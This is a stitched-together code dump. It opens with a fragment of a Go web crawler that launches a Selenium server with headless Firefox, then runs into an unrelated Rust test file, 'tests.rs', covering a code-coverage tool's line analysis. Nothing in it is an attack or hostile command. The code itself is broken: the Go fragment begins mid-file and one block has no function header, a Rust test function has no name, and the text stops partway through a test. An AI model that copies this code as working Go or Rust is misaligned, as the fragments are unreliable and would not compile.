func Get() *Crawler { return c } func (c *Crawler) GOTO() { if err := (*c.WebDriver).Get(c.URL); err != nil { log.Panic(errors.Wrap(err, fmt.Sprintf("Connect to %s", c.URL))) } } func (c *Crawler) LogJob(zlog *zerolog.Event, jobName string) *zerolog.Event { zlog. Str("type", "Crawler"). Str("server", "Topics"). Str("cronjob", jobName) return zlog } func getElenentText(element *selenium.WebElement) string { value, err := (*element).Text() if err != nil { return "" } return value }
{ // Check if there is a instance running, kill it if pid := sysexec.FindWebDriverPID(os.Getenv("WEB_INSTANCE_PORT")); pid != nil { sysexec.KillWebDriver(pid) } port, err := strconv.Atoi(os.Getenv("WEB_INSTANCE_PORT")) if err != nil { log.Fatal(errors.Wrap(err, "WebDriver can't get correct port number")) } crawler := Crawler{ URL: "https://www.google.com", SeleniumPath: os.Getenv("SELENIUM"), GeckoDriverPath: os.Getenv("GECKO_DRIVER"), Port: port, } // Start a Selenium WebDriver server instance (if one is not already running). opts := []selenium.ServiceOption{ selenium.StartFrameBuffer(), // Start an X frame buffer for the browser to run in. selenium.GeckoDriver(crawler.GeckoDriverPath), // Specify the path to GeckoDriver in order to use Firefox. // selenium.Output(os.Stderr), // Output debug information to STDERR. } // selenium.SetDebug(true) service, err := selenium.NewSeleniumService(crawler.SeleniumPath, crawler.Port, opts...) if err != nil { log.Fatal(errors.Wrap(err, "Selenium WebInstance start")) return nil, nil } // Connect to the WebDriver instance running locally. caps := selenium.Capabilities{"browserName": "firefox"} firefoxCaps := firefox.Capabilities{ Args: []string{ "--headless", }, } caps.AddFirefox(firefoxCaps) wd, err := selenium.NewRemote(caps, fmt.Sprintf("http://localhost:%d/wd/hub", crawler.Port)) if err != nil { log.Fatal(errors.Wrap(err, "Connect to WebDriver")) } crawler.WebDriver = &wd c = &crawler return service, c }
tests.rs
use crate::source_analysis::prelude::*; use syn::parse_file; #[test] fn logical_lines_let_bindings() { let config = Config::default(); let mut analysis = SourceAnalysis::new(); let ctx = Context { config: &config, file_contents: "fn foo() { let x = 5; }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert_eq!(lines.logical_lines.get(&3).copied(), Some(2)); assert_eq!(lines.logical_lines.get(&4).copied(), Some(2)); let ctx = Context { config: &config, file_contents: "fn foo() { let x = (0..15).iter() .filter(|x| { if x % 3 == 0 { true } else { false } }) .cloned() .collect::<Vec<u32>>(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.logical_lines.contains_key(&4)); assert!(!lines.logical_lines.contains_key(&5)); assert!(!lines.logical_lines.contains_key(&6)); assert!(!lines.logical_lines.contains_key(&7)); assert!(!lines.logical_lines.contains_key(&8)); assert!(!lines.logical_lines.contains_key(&9)); assert!(!lines.logical_lines.contains_key(&10)); assert!(!lines.logical_lines.contains_key(&11)); } #[test] fn match_pattern_logical_lines() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn foo(num: i32) -> bool { match num { 1 | 3 | 5 | 7 | 9 => { true }, _ => false, } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert_eq!(lines.logical_lines.get(&4), Some(&3)); assert_eq!(lines.logical_lines.get(&5), Some(&3)); assert_eq!(lines.logical_lines.get(&6), Some(&3)); assert_eq!(lines.logical_lines.get(&7), Some(&3)); assert_ne!(lines.logical_lines.get(&8), Some(&3)); } #[test] fn line_analysis_works() { let mut la = LineAnalysis::new(); assert!(!la.should_ignore(0)); assert!(!la.should_ignore(10)); la.add_to_ignore([3, 4, 10]); assert!(la.should_ignore(3)); assert!(la.should_ignore(4)); assert!(la.should_ignore(10)); assert!(!la.should_ignore(1)); } #[test] fn filter_str_literals() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test() { writeln!(#\"test \ttest \ttest\"#); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 1); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "fn test() { write(\"test test test\"); } fn write(s:&str){}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 1); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: " fn test() { writeln!( #\"test\"# ); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(5))); } #[test] fn filter_struct_members() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\npub struct Struct {\npub i: i32,\nj:String,\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 3); assert!(lines.ignore.contains(&Lines::Line(1))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\npub struct Struct (\n i32\n);", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.is_empty()); assert!(lines.ignore.contains(&Lines::Line(3))); } #[test] fn filter_enum_members() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\npub enum E {\nI1,\nI2(u32),\nI3{\nx:u32,\n},\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 3); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(6))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn filter_struct_consts() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct T{x:String, y:i32} fn test()-> T { T{ x:String::from(\"hello\"), //function call should be covered y:4, } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); } #[test] fn filter_unreachable_unchecked() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test() { core::hint::unreachable_unchecked(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_loop_attr() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test() { #[allow(clippy::option_unwrap_used)] loop { } #[allow(clippy::option_unwrap_used)] for i in 0..10 { } #[allow(clippy::option_unwrap_used)] while true { } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(8))); } #[test] fn filter_mods() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "mod foo {\nfn double(x:i32)->i32 {\n x*2\n}\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); let ctx = Context { config: &config, file_contents: "mod foo;", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); let ctx = Context { config: &config, file_contents: "mod foo{}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); } #[test] fn filter_macros() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "\n\nfn unused() {\nunimplemented!();\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); // Braces should be ignored so number could be higher assert!(!lines.ignore.is_empty()); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "\n\nfn unused() {\nunreachable!();\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.is_empty()); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { match x { 1 => 5, 2 => 7, _ => unreachable!(), } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn unused() {\nprintln!(\"text\");\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_tests() { let config = Config::default(); let mut igconfig = Config::default(); igconfig.ignore_tests = true; let ctx = Context { config: &config, file_contents: "#[cfg(test)] mod tests { fn boo(){ assert!(true); }\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &igconfig, file_contents: "#[cfg(test)] mod tests { fn boo(){ assert!(true); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "#[test]\nfn mytest() { \n assert!(true);\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); let ctx = Context { config: &igconfig, file_contents: "#[test]\nfn mytest() { \n assert!(true);\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); } #[test] fn filter_test_utilities() { let mut config = Config::default(); config.ignore_tests = true; let ctx = Context { config: &config, file_contents: "trait Thing { #[cfg(test)] fn boo(){ assert!(true); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let config = Config::default(); let ctx = Context { config: &config, file_contents: "trait Thing { #[cfg(test)] fn boo(){ assert!(true); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); } #[test] fn filter_where() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn boop<T>() -> T where T:Default { T::default() }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); let ctx = Context { config: &config, file_contents: "fn boop<T>() -> T where T:Default { T::default() }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); let ctx = Context { config: &config, file_contents: "trait foof { fn boop<T>() -> T where T:Default { T::default() } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); } #[test] fn filter_derives() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\nstruct T;", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); let ctx = Context { config: &config, file_contents: "\n#[derive(Copy, Eq)]\nunion x { x:i32, y:f32}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_unsafe() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn unsafe_fn() {\n let x=1;\nunsafe {\nprintln!(\"{}\", x);\n}\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "fn unsafe_fn() {\n let x=1;\nunsafe {println!(\"{}\", x);}\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); } #[test] fn cover_generic_impl_methods() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct GenericStruct<T>(T); impl<T> GenericStruct<T> { fn hw(&self) { println!(\"hello world\"); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.cover.contains(&3)); assert!(lines.cover.contains(&4)); let ctx = Context { config: &config, file_contents: "struct GenericStruct<T>{v:Vec<T>} impl<T> Default for GenericStruct<T> { fn default() -> Self { T { v: vec![], } } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.cover.contains(&5)); } #[test] fn cover_default_trait_methods() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "trait Thing { fn hw(&self) { println!(\"hello world\"); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.cover.contains(&2)); assert!(lines.cover.contains(&3)); } #[test] fn filter_method_args() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct Thing; impl Thing{ fn hw(&self, name: &str) { println!(\"hello {}\", name); } //5 } fn get_name() -> String { return \"Daniel\".to_string() } //10 fn main() { let s=Thing{}; s.hw( \"Paul\" //15 ); s.hw( &get_name() ); //20 }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(15))); assert!(!lines.ignore.contains(&Lines::Line(19))); } #[test] fn filter_use_statements() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "use std::collections::HashMap; use std::{ffi::CString, os::raw::c_char};", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn include_inline_fns() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[inline] fn inline_func() { // I shouldn't be covered println!(\"I should\"); /* None of us should */ println!(\"But I will\"); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.cover.contains(&3)); assert!(lines.cover.contains(&4)); assert!(!lines.cover.contains(&5)); assert!(!lines.cover.contains(&6)); assert!(!lines.cover.contains(&7)); assert!(lines.cover.contains(&8)); } #[test] fn cover_callable_noargs() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn foo() { std::ptr::null::<i32>(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_closure_contents() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn inline_func() { (0..0).iter().foreach(|x| { unreachable!(); }); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); } #[test] fn tarpaulin_skip_attr() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[cfg(not(tarpaulin_include))] fn skipped() { println!(\"Hello world\"); } #[cfg_attr(tarpaulin, not_a_thing)] fn covered() { println!(\"hell world\"); } #[cfg(not(tarpaulin))] fn uncovered() { println!(\"goodbye world\"); } #[tarpaulin::skip] fn uncovered2() { println!(\"oof\"); } #[no_coverage] fn uncovered3() { println!(\"zombie lincoln\"); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(7))); assert!(!lines.ignore.contains(&Lines::Line(8))); assert!(lines.ignore.contains(&Lines::Line(12))); assert!(lines.ignore.contains(&Lines::Line(13))); assert!(lines.ignore.contains(&Lines::Line(17))); assert!(lines.ignore.contains(&Lines::Line(18))); assert!(lines.ignore.contains(&Lines::Line(22))); assert!(lines.ignore.contains(&Lines::Line(23))); let ctx = Context { config: &config, file_contents: "#[cfg(not(tarpaulin_include))] mod ignore_all { fn skipped() { println!(\"Hello world\"); } #[cfg_attr(tarpaulin, not_a_thing)] fn covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(8))); assert!(lines.ignore.contains(&Lines::Line(9))); } #[test] fn
() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[cfg(not(tarpaulin_include))] trait Foo { fn bar() { println!(\"Hello world\"); } fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(8))); assert!(lines.ignore.contains(&Lines::Line(9))); let ctx = Context { config: &config, file_contents: "trait Foo { fn bar() { println!(\"Hello world\"); } #[tarpaulin::skip] fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); } #[test] fn tarpaulin_skip_impl_attrs() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct Foo; #[tarpaulin::skip] impl Foo { fn bar() { println!(\"Hello world\"); } fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(9))); assert!(lines.ignore.contains(&Lines::Line(10))); let ctx = Context { config: &config, file_contents: "struct Foo; impl Foo { fn bar() { println!(\"Hello world\"); } #[cfg(not(tarpaulin_include))] fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(9))); assert!(lines.ignore.contains(&Lines::Line(10))); } #[test] fn filter_block_contents() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { match x { 1 => 5, 2 => 7, #[test] _ => { unreachable!(); }, } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn filter_consts() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn boo() { const x: u32 = 3; }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn optional_panic_ignore() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { assert_eq!(x, 0); debug_assert!(x != 3419); match x { 1 => 5, 2 => 7, _ => panic!(), } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(7))); let mut config = Config::default(); config.ignore_panics = true; let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { assert_eq!(x, 0); debug_assert!(x != 3419); match x { 1 => 5, 2 => 7, _ => panic!(), } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn filter_nested_blocks() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn block() { { loop { for i in 1..2 { if false { while let Some(x) = Some(6) { while false { if let Ok(y) = Ok(4) { unreachable!(); } } } } } } } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(9))); } #[test] fn filter_multi_line_decls() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn print_it(x:u32, y:u32, z:u32) { println!(\"{}:{}:{}\",x,y,z); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); let ctx = Context { config: &config, file_contents: "struct Boo; impl Boo { fn print_it(x:u32, y:u32, z:u32) { println!(\"{}:{}:{}\",x,y,z); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); 